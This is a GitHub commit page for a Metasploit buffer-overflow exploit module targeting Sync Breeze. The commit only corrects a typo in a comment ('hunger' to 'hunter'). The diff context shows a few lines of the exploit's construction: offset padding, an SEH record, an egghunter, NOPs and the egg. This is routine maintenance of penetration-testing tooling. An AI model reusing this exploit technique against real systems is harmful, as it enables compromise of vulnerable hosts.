We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent e6c4fb1 commit 488f27bCopy full SHA for 488f27b
modules/exploits/windows/http/syncbreeze_bof.rb
@@ -184,7 +184,7 @@ def exploit
184
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length, payload_badchars)
185
sploit << generate_seh_record(target.ret)
186
sploit << hunter
187
- # Push the payload out of this buffer, which will make the hunger look for the payload
+ # Push the payload out of this buffer, which will make the hunter look for the payload
188
# somewhere else that has the complete payload.
189
sploit << make_nops(200)
190
sploit << egg
0 commit comments